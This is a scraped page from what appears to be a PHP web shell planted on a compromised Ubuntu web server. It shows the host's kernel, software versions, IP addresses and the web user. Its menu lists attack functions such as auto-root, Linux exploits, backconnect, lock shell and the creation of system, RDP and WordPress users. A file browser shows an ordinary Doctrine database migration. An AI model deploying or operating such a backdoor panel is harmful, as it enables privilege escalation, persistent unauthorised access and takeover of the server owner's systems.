Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.142.172.36
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz2 /
migrations /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitignore
0
B
-rw-rw-r--
Version20201203114504.php
2.24
KB
-rw-rw-r--
Version20201207200548.php
1.15
KB
-rw-rw-r--
Version20201207201703.php
866
B
-rw-rw-r--
Version20201207201955.php
1.14
KB
-rw-rw-r--
Version20201208070726.php
1.77
KB
-rw-rw-r--
Version20201216101536.php
2.12
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Version20201216101536.php
<?php declare(strict_types=1); namespace DoctrineMigrations; use Doctrine\DBAL\Schema\Schema; use Doctrine\Migrations\AbstractMigration; /** * Auto-generated Migration: Please modify to your needs! */ final class Version20201216101536 extends AbstractMigration { public function getDescription() : string { return ''; } public function up(Schema $schema) : void { // this up() migration is auto-generated, please modify it to your needs $this->addSql('ALTER TABLE user_depot DROP FOREIGN KEY FK_A55670E48510D4DE'); $this->addSql('ALTER TABLE user_depot DROP FOREIGN KEY FK_A55670E4A76ED395'); $this->addSql('ALTER TABLE user_depot ADD id INT AUTO_INCREMENT NOT NULL, ADD checkin DATETIME NOT NULL, DROP check_in, CHANGE check_out checkout DATETIME DEFAULT NULL, DROP PRIMARY KEY, ADD PRIMARY KEY (id)'); $this->addSql('ALTER TABLE user_depot ADD CONSTRAINT FK_A55670E48510D4DE FOREIGN KEY (depot_id) REFERENCES depot (id)'); $this->addSql('ALTER TABLE user_depot ADD CONSTRAINT FK_A55670E4A76ED395 FOREIGN KEY (user_id) REFERENCES user (id)'); } public function down(Schema $schema) : void { // this down() migration is auto-generated, please modify it to your needs $this->addSql('ALTER TABLE user_depot MODIFY id INT NOT NULL'); $this->addSql('ALTER TABLE user_depot DROP FOREIGN KEY FK_A55670E4A76ED395'); $this->addSql('ALTER TABLE user_depot DROP FOREIGN KEY FK_A55670E48510D4DE'); $this->addSql('ALTER TABLE user_depot DROP PRIMARY KEY'); $this->addSql('ALTER TABLE user_depot ADD check_in DATETIME DEFAULT CURRENT_TIMESTAMP, DROP id, DROP checkin, CHANGE checkout check_out DATETIME DEFAULT NULL'); $this->addSql('ALTER TABLE user_depot ADD CONSTRAINT FK_A55670E4A76ED395 FOREIGN KEY (user_id) REFERENCES user (id) ON UPDATE NO ACTION ON DELETE CASCADE'); $this->addSql('ALTER TABLE user_depot ADD CONSTRAINT FK_A55670E48510D4DE FOREIGN KEY (depot_id) REFERENCES depot (id) ON UPDATE NO ACTION ON DELETE CASCADE'); $this->addSql('ALTER TABLE user_depot ADD PRIMARY KEY (user_id, depot_id)'); } }
Close